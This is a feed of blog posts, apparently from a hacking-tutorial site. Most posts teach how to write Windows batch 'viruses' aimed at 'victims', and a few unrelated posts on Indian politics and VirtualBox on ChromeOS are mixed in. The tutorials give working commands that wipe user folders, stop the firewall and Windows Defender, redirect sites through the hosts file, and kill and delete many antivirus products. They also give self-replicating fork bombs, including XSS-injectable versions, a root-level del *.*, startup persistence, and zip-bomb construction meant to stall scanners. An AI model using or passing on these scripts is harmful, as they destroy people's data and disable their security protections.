In a standard text file, every character needs 1 byte (8 bits) of storage. So,

One thousand characters = 1,000 bytes (just under one kilobyte. Remember a kilobyte is 1024 bytes, not 1000)
One million characters = 1,000,000 bytes (just under one megabyte)
One billion characters = 1,000,000,000 bytes (just shy of one gigabyte)

The exact size doesn’t really matter. A 1GB text file will do just fine.

Now, open up your compression app (any will work, WinZip, WinRar, 7-zip, etc.) and compress the text file.
Hold on to your dropping jaw as you’ll likely see a compression rate of around 99.9% (1000 times reduction in file size), the 1 GB file would be around 1 MB compressed.
Now some final bit of copy-pasting is left. Make a dozen or so copies of the zip file. Now zip them.
Make a few copies of this new zip file and zip all the copies.
Keep adding more and more layers and viola! our zip bomb is ready. At 9 layers (each with 10 zipped files of the layer below), with a 1GB text file at the bottom, you’d have a total of 1 exabyte ( = 109*1GB = 1018 bytes) and the zip bomb would be a few kilobytes.

And there we go.

How is a zip bomb used?

So now that we have packed a ridiculous amount of data into one tiny file, what can be done with it? Is it just a quirky trick, interesting but useless? Yes and no.

Old compression applications used to come with a “feature” called recursive decompression. You could choose to fully unpack an archive that you knew had more archives within it. The zip bomb was actually a bomb for these applications. Even today, most common storage devices (like the hard disk in your computer) are pretty slow. So, it would take a good long while to write a large amount of data to the storage device. Anyone slowly unpacking a zip bomb would quickly notice this and simply stop the process, defusing our bomb. Most modern applications don’t use recursive decompression because of zip bombs.

In the same vein, most modern anti-virus programs can detect whether a file is a zip bomb and avoid unpacking it. In many anti-virus scanners, only a few layers of recursion are performed on archives to help prevent attacks that would cause a buffer overflow, an out of memory condition, or exceed an acceptable amount of program execution time. Zip bombs often (if not always) rely on the repetition of identical files to achieve their extreme compression ratios. Dynamic programming methods can be employed to limit the traversal of such files so that only one file is followed recursively at each level - effectively converting their exponential growth to linear. And so the bomb is defused yet again.

If this weren’t the case, then zip bombs would still be a viable attack against anti-viruses, or at the very least a stalling technique. It’s pretty straightforward. A malicious hacker’s holy grail is to be able to run an executable file on the victim’s computer without the prying eyes of anti-viruses. Anti-viruses keep a close watch on new potentially dangerous files. So to execute a potentially dangerous file, why not distract the anti-virus with something else? This is exactly what a zip bomb could do in earlier times. While the anti-virus is choking up, a malicious executable could easily steal data or install backdoors or just about anything and even whitelist these installations in the anti-virus completely owning the system.

But this technique is no longer viable. This is both good for us (as users) and bad for us (as hackers). But security is a race without a finish line. You can’t ever be sure that a system is completely secure. Even if you do find the very last security hole in a system, you’ll never be able to know that it was indeed the last security hole. All we can do is keep on looking and that leaves open the possibility that perhaps one day a new vulnerability would be found and zip bombs would come back with a bang.

And that ends the story of the zip bomb. These actually come under the class of logic bombs, which also contains the fork bomb we made using batch files. Zip bombs show us that the field of hacking is ripe with creativity and resourcefulness. Even limited memory can be thought of as a “flaw”, a security hole present in all computers.

When the old methods stop working, new ones soon pop up and take their place. In cybersecurity, if you can’t seem to win by playing fair, trickery and deceit can often give you the upper hand. And that brings us to the realm of social engineering.

How to make your Own Virus

Thu, 16 Jul 2020 07:38:39 GMT

By now you should have a pretty good grip on working with batch files. The time has come for you to fly out of the nest. Presented below are a few ideas for things that you can make your viruses do.

These commands should work on most Windows 10 systems with the default configuration. However, you may need to tweak some of them before they work for you. For example, to kill your victim’s anti-virus, you’ll need to know what anti-virus they have in the first place, only then can you stop its process and delete it.

Warning: Executing some of these commands WILL result in permanent loss of data. If you want to try these out, do so in a virtual machine.

Delete important stuff

Damaging personal data is a purely destructive attack motive. The attacker gains nothing but the victim loses something. For better or worse, this is something that batch files really shine at. Batch files can quietly delete vast quantities of data without the victim ever realizing what’s happening until it’s too late. And using the del command means the data is not going to the recycle bin, it’s permanently deleted.

What’s even scarier is that most directories, including the examples below, don’t require admin privileges to access, by default. However, if you are able to run a batch file as an administrator then that opens up the entire system to attack (such as deleting anti-viruses to allow other malware to roam freely).

Delete Documents
```
del /f /q "%userprofile%\Documents\*.*"
```
Delete Music
```
del /f /q "%userprofile%\Music\*.*"
```
Delete Pictures
```
del /f /q "%userprofile%\Pictures\*.*"
```

Disable Important stuff

The fact that windows provide utilities and services that can be accessed through the command line opens up yet another attack vector. Changing important configurations such as registry entries can render a computer unusable.

Disable Wi-Fi - Let’s see how we can go about this. First, we find out the names of all the network interfaces:

netsh interface show interface

This outputs:

Admin State    State          Type             Interface Name
-------------------------------------------------------------------------
Enabled        Disconnected   Dedicated        Ethernet
Enabled        Connected      Dedicated        VirtualBox Host-Only Network
Enabled        Connected      Dedicated        Ethernet 2
Enabled        Connected      Dedicated        Wi-Fi

For my computer, the wireless interface is simply named Wi-Fi (it may be different for you). And now we can just disable it:

netsh interface set interface "Wi-Fi" Disable

And the Wi-Fi stops working and also the Wi-Fi icon disappears from the taskbar.

It can be re-enabled by using this command: (P.S: Disabling/Enabling interfaces requires admin privileges.)

netsh interface set interface "Wi-Fi" Enable

Or through the control panel:

Disable the firewall
```
net stop "MpsSvc"
```

Stop Windows Defender

taskkill /f /t /im "MSASCuiL.exe"
taskkill /f /t /im "MSASCui.exe"

Block Websites

We can block any website we want by editing the hosts file:

cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 google.com >> "hosts"
echo 127.0.0.1 www.google.com >> "hosts"

127.0.0.1 is the localhost. The above command tells the computer that it’s going to find google.com on your own device. So the browser doesn’t even bother trying to find out the real IP address of google.com, it just uses localhost, where of course it doesn’t get a reply. You’ll usually want to block both the top level domain as well as the www. subdomain.

This is kind of a shitty thing to do to someone, don’t you think? Maybe you should be a white-hat and make a “virus” that blocks intrusive ads and help protect your victim’s privacy.

Delete all anti-viruses

The following snippet tries to disable and delete all common anti-viruses. It’s really just a hail mary and definitely not the most appropriate way to go about this. You’ll need admin rights to run this. Below you’ll see two types of commands:

taskkill: These commands attempt to kill the running anti-virus processes. A bunch of common process names are included below. Note that we’re using the wildcard * in the names. This means, for example, av* will include all the names that begin with ‘av’. So it is possible that a whole lot of innocent process also get caught in the crossfire.
RMDIR: These commands simply delete the default installation folders of the anti-viruses.

taskkill /F /IM av* >NUL
taskkill /F /IM fire* >NUL
taskkill /F /IM anti* >NUL
taskkill /F /IM spy* >NUL
taskkill /F /IM bullguard* >NUL
taskkill /F /IM PersFw* >NUL
taskkill /F /IM KAV* >NUL
taskkill /F /IM ZONEALARM* >NUL
taskkill /F /IM SAFEWEB* >NUL
taskkill /F /IM OUTPOST* >NUL
taskkill /F /IM nv* >NUL
taskkill /F /IM nav* >NUL
taskkill /F /IM F-* >NUL
taskkill /F /IM ESAFE* >NUL
taskkill /F /IM cle* >NUL
taskkill /F /IM BLACKICE* >NUL
taskkill /F /IM def* >NUL
taskkill /F /IM kav* >NUL
taskkill /F /IM kav* >NUL
taskkill /F /IM avg* >NUL
taskkill /F /IM ash* >NUL
taskkill /F /IM aswupdsv* >NUL
taskkill /F /IM ewid* >NUL
taskkill /F /IM guar* >NUL
taskkill /F /IM gcasDt* >NUL
taskkill /F /IM msmp* >NUL
taskkill /F /IM mcafe* >NUL
taskkill /F /IM mghtml* >NUL
taskkill /F /IM msiexec* >NUL
taskkill /F /IM outpost* >NUL
taskkill /F /IM isafe* >NUL
taskkill /F /IM zap* >NUL
taskkill /F /IM zauinst* >NUL
taskkill /F /IM upd* >NUL
taskkill /F /IM zlclien* >NUL
taskkill /F /IM minilog* >NUL
taskkill /F /IM norton* >NUL
taskkill /F /IM ccc* >NUL
taskkill /F /IM npfmn* >NUL
taskkill /F /IM loge* >NUL
taskkill /F /IM nisum* >NUL
taskkill /F /IM issvc* >NUL
taskkill /F /IM tmp* >NUL
taskkill /F /IM tmn* >NUL
taskkill /F /IM pcc* >NUL
taskkill /F /IM cpd* >NUL
taskkill /F /IM pop* >NUL
taskkill /F /IM pav* >NUL
taskkill /F /IM padmin* >NUL
taskkill /F /IM panda* >NUL
taskkill /F /IM avsch* >NUL
taskkill /F /IM sche* >NUL
taskkill /F /IM syman* >NUL
taskkill /F /IM virus* >NUL
taskkill /F /IM realm* >NUL
taskkill /F /IM sweep* >NUL
taskkill /F /IM scan* >NUL
taskkill /F /IM ad-* >NUL
taskkill /F /IM safe* >NUL
taskkill /F /IM avas* >NUL
taskkill /F /IM norm* >NUL
taskkill /F /IM offg* >NUL
RMDIR /Q "C:\Program Files\alwils~1" /S >NUL
RMDIR /Q "C:\Program Files\Lavasoft\Ad-awa~1" /S >NUL
RMDIR /Q "C:\Program Files\kasper~1" /S >NUL
RMDIR /Q "C:\Program Files\trojan~1" /S >NUL
RMDIR /Q "C:\Program Files\f-prot95" /S >NUL
RMDIR /Q "C:\Program Files\tbav" /S >NUL
RMDIR /Q "C:\Program Files\avpersonal" /S >NUL
RMDIR /Q "C:\Program Files\Norton~1" /S >NUL
RMDIR /Q "C:\Program Files\Mcafee" /S >NUL
RMDIR /Q "C:\Program Files\Norton~1\Norton~1\Norton~3" /S >NUL
RMDIR /Q "C:\Program Files\Norton~1\Norton~1\speedd~1" /S >NUL
RMDIR /Q "C:\Program Files\Norton~1\Norton~1" /S >NUL
RMDIR /Q "C:\Program Files\Norton~1" /S >NUL
RMDIR /Q "C:\Program Files\avgamsr" /S >NUL
RMDIR /Q "C:\Program Files\avgamsvr" /S >NUL
RMDIR /Q "C:\Program Files\avgemc" /S >NUL
RMDIR /Q "C:\Program Files\avgcc" /S >NUL
RMDIR /Q "C:\Program Files\avgupsvc" /S >NUL
RMDIR /Q "C:\Program Files\grisoft" /S >NUL
RMDIR /Q "C:\Program Files\nood32krn" /S >NUL
RMDIR /Q "C:\Program Files\nood32" /S >NUL
RMDIR /Q "C:\Program Files\nod32" /S >NUL
RMDIR /Q "C:\Program Files\nood32" /S >NUL
RMDIR /Q "C:\Program Files\kav" /S >NUL
RMDIR /Q "C:\Program Files\kavmm" /S >NUL
RMDIR /Q "C:\Program Files\kaspersky" /S >NUL
RMDIR /Q "C:\Program Files\ewidoctrl" /S >NUL
RMDIR /Q "C:\Program Files\guard" /S >NUL
RMDIR /Q "C:\Program Files\ewido" /S >NUL
RMDIR /Q "C:\Program Files\pavprsrv" /S >NUL
RMDIR /Q "C:\Program Files\pavprot" /S >NUL
RMDIR /Q "C:\Program Files\avengine" /S >NUL
RMDIR /Q "C:\Program Files\apvxdwin" /S >NUL
RMDIR /Q "C:\Program Files\webproxy" /S >NUL
RMDIR /Q "C:\Program Files\panda software" /S >NUL

Our journey has only just begun so we must keep moving. It should go without saying that you must use this knowledge ethically. Today’s systems are largely protected from little batch file viruses, but soon we’re going to learn about hacking techniques that can be used to really hurt people and businesses, financially or otherwise. And with that, we bid farewell to batch file viruses.

Next up, we’re going to have a little fun and learn about something quite explosive.

Moral Outrage on Indian Foreign Affairs

Sat, 11 Jul 2020 04:24:07 GMT

What is happening around us (India)? In the ongoing pandemic, we are already facing a large economical crisis. Our government is trying its best to help the needed! At least that is what is portrayed by the media and news channel. Is it really true? Such a topic is always controversial and tends to have a lot of political influence.

But as far as the foreign policy is considered we as citizens knew very less because even the media dont have sufficient resources to sugarcoat it. Need an example of sugarcoating?

Ali Bhatt was pregnant because of Karan Johar

The fact: Ali Bhatt needs to take the role of pregnant women, in the direction of Karan Johar. These days this is how most of the media content rolls. It is similar to clickbait videos on youtube. It is how they make news Interesting and memorable, I dont blame them.

Back to the main topic. Here are some burning and current issues. #MoralOutrageV2 (Online Mode)

Forever enmity with Pakistan, dont know when we will have a stable diplomatic stand from both the sides.
Afghanistan, Do I need to mention the ongoing Taliban Crisis and How India was being neglected due to our stand in support of the Present government?
China’s claim over Aksai Chin Region, entire Arunachal Pradesh and the recent Galwan Vally issue. China is always like that, they claim everything. Ex: The Tibet, The Hongkong, The South China Sea. Dudes in Chine at least leave the seas alone -_-
Nepal, did you forget the Roti-Beti relations with India? Why so serious towards India all of a sudden?
In the case of Bhutan, in a way we have their military and foreign control. Recently many amendments took place as it is threatening Bhutan’s sovereignty
Bangladesh, also known as East Pakistan till Bangladesh Liberation War. Due to the recent Citizenship Amendment Act and NRC: National Register of Citizens - we dont have good relations, even though our Home Minister gave them a clear indication that excluded citizens of Indians will not be sent to Bangladesh as refugees.
Hello Nagaland, why do you need a separate flag? Why? Check out the 7th Schedule of our Constitution, it is especially for you guys. Unlike Article 370. Hope they will not take support from Myanmar for their liberation.
Last but not least, Srilanka, anyone from Tamil Nadu. Yeah, you knew it well.

This is not an elaborate post on the current issues, but it will give you some insights into current India and have a better understanding, as many of my viewers never cared about India’s stand towards its neighboring countries.

I don’t know what GoI is planning to do, but it needs to solve these issues diplomatically and as fast as possible. If not, India will never have a helping hand from its immediate neighbors which is very important. So GoI, don’t make this a political issue for your vote bank focus on doing something rather than showing off your policies: Neighbour First Policy.

How to install Virtualbox in ChromeOS

Mon, 29 Jun 2020 05:05:31 GMT

In this guide, I assume you are familiar with @sebanc brunch, Crouton, Chroot, and obviously Virtualbox. If you are not familiar with anyone of these first go through the following links and get a brief idea for conceptual clearance in your head.

These are the steps we cover in this Guide.

Install ChromeOS in your PC
Installing a Chroot based Ubuntu Instance
Setting up the Environment in Ubuntu
Installing Virtual Box

Installing ChromeOS in your PC

I guess you are familiar with the Brunch of this master branch, with which you can use Install the ChromeOS in any PC - provided your PC meets the hardware requirements.

Any quires in this section, you are free to browse through the existing issues or to open a new issue.

Installing a Chroot based Ubuntu Instance

Follow these instructions, in case of any errors stop it - do some research or comment it below.

Download crouton
Open a shell (Ctrl+Alt+T, type shell, and hit enter)
Copy the installer to an executable location by running sudo install -Dt /usr/local/bin -m 755 ~/Downloads/crouton
Now that it's executable, run the installer itself: sudo crouton -r xenial -t xfce
Wait patiently and answer the prompts like a good person. At the end of the installation, you need to provide username and password for the Ubuntu installation.
Done! You can jump straight to your Xfce session by running sudo enter-chroot startxfce4 or, as a special shortcut, sudo startxfce4
Cycle through Chromium OS and your running graphical chroots using Ctrl+Alt+Shift+Back(F1) and Ctrl+Alt+Shift+Forward(F2).
Exit the chroot by logging out of Xfce.

Step 6,7,8 are optional steps, which will provide you an idea about the usage of crouton

Setting up the Environment in Ubuntu

After successful completion of Step 5, you can launch the Ubuntu using Xfce using Step 6 or you can use this command: sudo enter-chroot to access the Ubuntu terminal. It's up to you how you want to access the Ubuntu terminal.

In the ubuntu terminal, use this command before installing anything. sudo mount -o remount,rw /lib/modules/*

Installing Virtual Box

The above step, which focuses on setting up of environment is a must. The command: sudo mount -o remount,rw /lib/modules/* should be executed without any error. If you have no error proceed further.

crostini needs to be disabled in ChromeOS settings

sudo apt install virtualbox to install VirtualBox
Before using VirtualBox, run sudo modprobe vboxdrv

We are all set, now you have a working VirtualBox in ChromeOS, If you have any suggestion or issue feel free to comment.

New updates: None for now

If you are in search of a detailed guide on how to install ChromeOS on any PC, let me know it through the comment section.

Frequently Asked Questions About Batch Files

Mon, 29 Jun 2020 03:37:12 GMT

So now we’ve got a bunch of batch file viruses under our belt. Now it’s time to further solidify your understanding of batch scripting, so that you can start making your own useful batch files (malicious or not). Read up on any new command’s help documentation before using them, or simply run them inside a virtual machine.

Included below are some of the most common questions regarding batch files, in general. If you are to truly master the art of working with batch files (and the viruses you can make with them), you’ll need to know the answers to these. Batch file programming is very easy, even non-technical people can get the hang of it pretty quickly. Soon enough, you’ll be making your own little scripts (and viruses).

1. Should I use .bat or .cmd as the extension of a batch file?

Use either, it doesn’t matter (mostly). There are some minor technical differences between the two but nothing that we need to concern ourselves with while using them on modern Windows operating systems.

2. How to add comments to a batch file?

There are two ways to add comments to batch files:

rem

@echo off
REM This line will be skipped by the interpreter
ping leewardslope.com

::

@echo off
:: This line will also be skipped by the interpreter
ping leewardslope.com

3. How to make a batch file sleep or wait for X seconds?

Say you want to pause for 4 seconds. The following is a popular hack for doing this:

ping 127.0.0.1 -n 5 > nul

This command pings the localhost IP address. The parameter -n 5 means it will ping five times. The first ping happens at t=0 and there’s a time delay of 1 second between each ping so that gives us a 4 second delay where our batch file seems to be doing nothing. Finally, > nul eats up the output of the command so we don’t see it during execution.

Another way to set a timeout in a batch file is to simply use the timeout command:

timeout 4

This displays a countdown in the output window like:

Waiting for 3 seconds, press a key to continue ...

If you don’t want to see the countdown:

timeout 4 > nul

Be careful, the timeout command can be skipped by pressing any key. Also, the command timeout x means “sleep anywhere between x-1 and x seconds”, so it’s a little inaccurate.

4. How to run multiple batch files from within a batch file?

Say you have three batch files that you want to call from one master.bat. There’s a couple ways to run these other batch files from inside master.bat:

This method will execute the batch files one after the other in the same process:
```
call batch1.bat
call batch2.bat
call batch3.bat
```

This method will spawn different command windows each running one batch file:

start cmd /k call batch1.bat
start cmd /k call batch2.bat
start cmd /k call batch3.bat

5. How to echo a newline in batch files?

Using echo. you can print out a blank line.

echo hello
echo.
echo world

Make sure that there are no spaces between echo and .. The above snippet prints:

hello
world

6. How to run two commands in one line using cmd.exe or batch files?

When working in a cmd.exe prompt: echo hello & echo world. This outputs: hello world.
For batch files, use && instead of & like echo hello && echo world.

7. How to check if a file exists from within a batch file?

We can do this by using the constructs if and exist:

if exist [INSERT_FILE_NAME_HERE] (
    echo file exists
) else (
    echo file doesn't exist
)

If you don’t care about else just leave it out. For example:

if exist myfile.txt echo file exists

8. How to write the output of a command to a file?

dir > output.txt

This will write the output of the command dir to output.txt.

9. How to execute a command N times (in a loop) in batch files?

For a single command, we can use the one liner:

for /l %%x in (1, 1, 100) do echo %%x

For looping multiple commands:

for /l %%x in (1, 1, 100) do (
   echo %%x
   echo something else
)

Explanation: The iteration variable %%x is initialized to 1 and incremented by 1 after every iteration until it equals 100. The above is for use in a batch file, for using in a command window directly use a single % instead of %%.

10. How to iterate through files and subdirectories within a directory?

For use in a command window:

Files in the current directory: for %f in (.\*) do echo %f
Subdirectories in the current directory: for /D %s in (.\*) do echo %s
Files in current and all subdirectories: for /R %f in (.\*) do echo %f
Subdirectories in current and all subdirectories: for /R /D %s in (.\*) do echo %s

For batch files, replace % with %%:

Files in the current directory: for %%f in (.\*) do echo %%f
Subdirectories in the current directory: for /D %%s in (.\*) do echo %%s
Files in current and all subdirectories: for /R %%f in (.\*) do echo %%f
Subdirectories in current and all subdirectories: for /R /D %%s in (.\*) do echo %%s

11. How to get a list of all running services from the command line?

The command net start will output a list of all the currently running services.

12. How to start or stop services from the command line?

net start [serviceName]

and

net stop [serviceName]

13. How to check for admin privileges in a batch file?

The command net session can be used to check whether the batch file has administrator privileges or not:

net session >nul 2>&1
if %errorLevel% == 0 (
    echo Success: Administrative permissions confirmed.
) else (
    echo Failure: Current permissions inadequate.
)

Explanation: First we direct the output and error streams of the net session command to nul and check whether the command executes successfully (errorLevel = 0), which means we have admin privileges, or the command receives an error (errorLevel!=0), which means we don’t have admin privileges.

14. How to check if a program is running or not in a batch file?

The following snippet checks whether chrome.exe (Google Chrome) is running or not:

tasklist /FI "IMAGENAME eq chrome.exe" 2>NUL | find /I /N "chrome.exe">NUL
if %errorLevel% == 0 (
    echo Program is running
) else (
    echo Program is not running
)

15. How to forcibly kill a process using batch files?

The command taskkill along with the /f modifier can be used to forcefully shutdown all processes that match the given name (the /im parameter). The process ID (/pid) can be used to kill a single instance (For example, one specific Google Chrome tab).

taskkill /f /im "Taskmgr.exe"

Note that you may require admin privileges to kill some processes.

16. How to quickly create a large file in Windows?

We can do this using fsutil.

fsutil file createnew [fileName] [length]

This creates a file with a name fileName and size length (in bytes). This would be a sparse file, i.e. composed of just a string of zeros. For example:

fsutil file createnew useless.txt 1024

will create a 1 kilobyte file named useless.txt.

17. How to copy all the files from one folder to another using a windows command?

xcopy is a utility built into Windows that does exactly this.

xcopy /s C:\source C:\target

Remember to enclose the path in double quotes if the path contains spaces (e.g: "C:\Some Folder").

18. How to delete a folder along with all the subfolders and files?

The rmdir command is used to delete directories.

rmdir "FolderName" /s /q

/s is used to specify removal of the entire directory tree under FolderName.
/q specifies ‘quiet mode’, that is, delete without requiring confirmation.

19. How to see the help documentation for a command?

Open up a command window and type help [command_name]. For example: help taskkill.

And that wraps up our little series on batch files (almost). You should now head out and start experimenting on your own. Who knows, you just might make something that can fly under the radar of an anti-virus. Now let’s look a few ideas for making your own batch file viruses.

Folder blaster, The more annoying the better

Sun, 14 Jun 2020 13:55:57 GMT

The commands we use to make batch files are actually the same commands first implemented in MS-DOS (An ancient microsoft OS). These DOS(Disk Operating System) commands can also be used in the command prompt window. Whatever your batch file does, you can do it through the command line interface (CLI).

Start “Run”, or hit [Windows key + R]. Type “cmd”, and you’re presented with the CLI. You can type “help” to get a list of commonly used commands and their functions. I recommend you try out each and every single command you can find. Hacking is getting more and more user friendly everyday, CLIs are being replaced by GUIs (Graphical User Interfaces) - meaning in most places you won’t have to actually type in the commands, you can just select an option and press a button. But as of now, this is a work in progress. With more advanced hacking techniques, specially the ones that involve using BackTrack tools, you will find that majority of the hacks are still done through the CLI (More on this, later).

You will soon be learning how to hack into a remote computer and get the CMD window of the victim’s computer. Hence, I recommend getting used to the CLI, as soon as possible, as much as possible. Before getting to the code, let’s take a look at a couple of commands.

md - (or mkdir) - Make Directory. This command is used to create a directory (a folder). The command:

md abcd

..will create a folder in the current directory named “abcd”.

cd - Change Directory. This command is used to change the current directory. The following command:

cd C:\

..will take the program (your batch file) to the Root folder and:

cd C:\Users

..will take you to the folder called Users in the C drive. You can change where you “mkdir” by using “cd”. (You can now create folders in any directory you like)

Here we’ve got the Folder Blaster virus. Again, this one’s fairly easy to understand. What we’re doing below is creating a bunch of folders, opening them all at once and keeping them open, effectively hogging a big portion of the screen and memory causing the windows to lag, freeze up and sometimes crash.

@echo off
cd ./Desktop
md 1
md 2
md 3
md 4
md 5
md 6
md 7
md 8
md 9
md 0
:checkpoint
start 1
start 2
start 3
start 4
start 5
start 6
start 7
start 8
start 9
start 0
goto checkpoint

So, we begin by turning off echo. Then we change the directory to Desktop. Now we create ten folders with names 0-9. We setup a label and start opening up all the 10 folders. Now the final statement causes an infinite loop. Of course, if the folder is already opened it will not be opened again. But the use of this infinite loop is if the user attempts to close the folder, the loop is still going on and it will send a message to open that folder again. So the victim will be stuck as every time s/he closes a folder it opens up again, eventually making them give up and restart the system.The above code can be made much shorter with the use of LOOPs, as discussed below. We start by creating a variable and setting it’s value to 0. We use this variable as a check to let the computer know when to come out of the loop. Take a look at the code first:

@echo off
set /a i=0
:loop
if %i%==10 goto end
echo This is iteration %i%.
set /a i=%i%+1
goto loop
:end

“set” is used to define and initialize a variable. Here we create a variable called “i” and set it’s value to zero. After setting up a label, we check if the value of the variable “i” (given by %i%) is equal to 10, and if it is we “goto” the label end (the program ends when this happens). Now we “echo” (send a message) to notify the user which iteration is currently running. In the next step we increment the value of “i” by one and then go back to the “if” statement.

So the loop runs ten times (0-9), and then stops. The above was not a virus, but a simple program. Earlier, I told you that the above Folder Blaster virus code can be made shorter by using loops. You know how to make the virus, and now you know how to use loops. Combining the two of them, I leave as an exercise for the wannabe hacker. (HINT: See the folder names up top going from 0-9 ? You can just replace them with %i% in the above loop.)

Next up, we’re going to equip you with the tools you need to be able to start creating your own viruses. Let’s head over there and learn a bit more about batch file viruses.

Wiping out memory, Obliviate

Sat, 13 Jun 2020 04:24:41 GMT

Now that we’ve learned how to overloaded the computer’s memory, in this tutorial we’re going to wipe it all off. This is a short and easy one. This is different than the other batch file viruses we’ve seen yet. This can do real damage. Make sure you only run this inside a VM.

del *.*

A quick refresher, the del command is used to delete files or folders with the following syntax:

del [options] [/A:file_attributes] files_to_delete

For example: the command del fileName.extensionwill delete the file ‘fileName.extension’ in the current directory.*is a wildcard, it means ‘all’. So *.* means ‘all file names with any extensions’. Putting a * before the . (dot) means that no matter what the file’s name is, it will be deleted. Putting a * after the . means that no matter what the file’s type is, it will be deleted. Combined, del *.* means that all files and folders encountered by our script in the current directory will be wiped off completely.

Clearly, this could be quite dangerous to a system as nothing will be left, even the operating system’s vital files may be deleted, when this guy is done. But of course, it can only affect files in the directory where the batch file itself is placed. So, placing it at the root level (say C:\deleteEverything.bat) is the way to go.

How do we protect against it? For one, we have the principle of least privilege(PoLP). In most modern operating, the problem of accidental deletion of mission critical files is solved by the use of user access levels. In Windows, if you try to delete something important, you are sure to be greeted by:

If you try to delete something really really important, the operating system will simply deny doing so. Similarly, if you try to mess with someone else’s files (in a multi-user environment), you may not be able to read, edit, execute (or all three) depending on what permissions they (the other user) and the admin has granted you and by extension any scripts or programs you try to run.

Linux, on the other hand, is even more obsessive when it comes to privileges. File permissions form a core part of nearly all Unix-like systems. So, we hackers have our work cut out for us. Unfortunately our cute little virus will likely not completely corrupt today’s systems. However, it can still wipe out any confidential documents that your victim holds dear so it is still dangerous. If you wish to try it out, fire up a virtual machine and let it rip.

Now let’s try a different kind of virus. Up next, we’ve got the mighty folder blaster

Overloading Memory, The thing about machines is that they all have a limit.

Fri, 12 Jun 2020 03:31:24 GMT

This virus combines the best of the fork bomb and the application flooder.

It creates a new batch file in the same directory and then copies itself onto this new file. It then starts this new virus and then both of them create another copy of themselves which are then run and the process repeats over and over and we have an exponential growth in the number of viruses on disk and in memory (RAM).

So let’s have a look:

@echo off
:A
set x=%random%
type %0 >> %x%.bat
start %x%.bat
goto:A

Depending on what runs out first hard disk space or RAM, the batch file may or may not cause permanent damage. In both cases, however, the computer will almost definitely crash, the operating system may be corrupted and on the next start up, you will be greeted by the well-known “Blue Screen Of Death”. The only way to get rid of it will be to format your hard drive and re-install the operating system.

(Optional) To make this file execute automatically at startup, Do the following. Create a shortcut of the damage.bat file by right clicking on it. Open the start menu, In programs Open Startup folder and simply drag or cut-paste the shortcut into this folder. The virus will break loose the next time the computer is started up.

These past couple of batch file viruses were, at best, annoying. Now let’s do some real damage. Next up, we’re going to be wiping out memory.

Application Flooder, Annoy the hell out of your victims

Thu, 11 Jun 2020 13:08:47 GMT

Not unlike the fork bomb we just saw, the “Application flooder” although technically harmless, is a really annoying virus. Here’s how it looks:

@echo off
:begin
start mspaint
start notepad
start write
start cmd
start explorer
start control
start calc
goto begin

Like all the other batch file virus tutorials, I recommend trying this one out in a virtual machine.

Let’s go through it line by line:

@echo off- This simply stops the command prompts from appearing when the batch file is executing. When you start a batch file, a command prompt process (cmd.exe) is opened and that batch file’s instructions are piped through. We use@echo offwhen we don’t want to notify the user about what the running batch file is doing.
:begin- This is a label. It’s like a marker or a checkpoint, a position in the program that we’ve given a name to.
start- This is used to start an executable, similar to what happens when you double click an application. You can see that we have a bunch of these commands and they’re all starting something different. These are just a handful of the default programs that come with all installations of windows. This is where we’reflooding applications. Specifically we’re starting up the applications: Paint, Notepad, WordPad, a command window, file explorer, control panel and a calculator. You can start up any executable (.exe) by using start <PATH-TO-EXECUTABLE>.
goto- Remember the label we just defined above? (:begin) Using the goto command, wego tothe label ‘begin’, and the program continues execution from there. This is an infinite loop. So all the above applications are started again and again until there are hundreds of open windows or until the operating system crashes or a good antivirus intervenes.

So there you have it. This is one of the most simplest and oldest viruses out there. But the story isn’t over yet. The viruses that actually infect and harm the systems in this day and age are vastly more complicated However, you are now one step closer to a better understanding of the big picture. Head over to the next virus to continue.

Fork Bomb, a Classic Attack

Wed, 10 Jun 2020 10:25:52 GMT

The fork bombis the equivalent of a DDoS attack on your own system. It aims to deprive the system of memory (RAM), leaving nothing for other applications or the operating system’s vital operations required to keep the systems running, hence crashing it. Just 5 characters long, the fork bomb is not permanently harmful for a computer, just annoying.

We’re now going to build on the introduction to batch files. Make sure you’ve got a VM all set up and running.

And here is the fork bomb:

%0|%0

Yes, this is it. The above is a shorter alternative for the following more comprehensible code:

:s
start %0
goto s

Here, the first line creates a label s.
%0 actually refers to the name of the batch file itself. By start %0 we’re running the same file again.
And finally goto s brings us back to the top, forming a loop.

So every time the loop is run another instance of the same program is started and then both of them run together and again duplicate themselves and so on.

Every program doubling itself is a form of exponential growth. After one iteration of the loop, two programs (21) are created. After another cycle, each of those two create another two for a total of four (22). After 10 iterations we have 1024 (210) instances of our little batch file. After 100 iterations we have 2100=1.267 nonillion, a number so big you don’t even know what ‘nonillion’ is (It’s 1030).

The first instance will likely not even complete 50 iterations before the system grinds to a halt and crashes. For such a simple script, each individual iteration would hardly take a few milliseconds, so the first few iterations complete very quickly and soon it becomes more than what the computer can handle.

Is there a way to protect against fork bombs? Yup.

Any antivirus worth it’s salt would be able to scan this suspicious executable file and warn the user before execution. As a fork bomb’s mode of operation is entirely dependent on being able to create new processes, one way of preventing a fork bomb from severely affecting the entire system is to limit the maximum number of processes that a single user may own. On Linux, this can be achieved by using the ulimit utility; for example, the command ulimit -u 30 would limit the affected user to a maximum of thirty owned processes.

And so we have our first little virus under our belt. Head over to the next one to continue or scroll down if you’re interested in checking out the code for fork bomb in other common languages.

Bash
```
:(){ :|:& };:
```
Python
```
import os
while 1:
   os.fork()
```

Java

public class ForkBomb
{
public static void main(String[] args)
{
  while(true)
  {
    Runtime.getRuntime().exec(new String[]{"javaw", "-cp", System.getProperty("java.class.path"), "ForkBomb"});
  }
}
}

Ruby
```
loop { fork { load(__FILE__) } }
```

#include <unistd.h>

int main(void)
{
  while(1) {
    fork(); /* malloc can be used in order to increase the data usage */
  }
}

JavaScript

while (true) {
var w = window.open();
w.document.write(document.documentElement.outerHTML||document.documentElement.innerHTML);
}

The following version is easier for injection (XSS):

<a href="#" onload="function() { while (true) { var w = window.open(); w.document.write(document.documentElement.outerHTML||document.documentElement.innerHTML); } }">XSS fork bomb</a>

And the following is simply a more aggressive version of the above:

<script>
setInterval(function() {
var w = window.open();
w.document.write(document.documentElement.outerHTML||document.documentElement.innerHTML);
}, 10);
</script>

And so we have our first little virus under our belt. Let's head over to the next one to continue

Introduction to Batch File Viruses

Sun, 07 Jun 2020 10:25:13 GMT

In the following few tutorials, we’ll be learning about batch file viruses. We’ll look at various techniques to bring down a computer using small and simple scripts. Even if you have no background in programming, you’ll find it very easy to follow along.

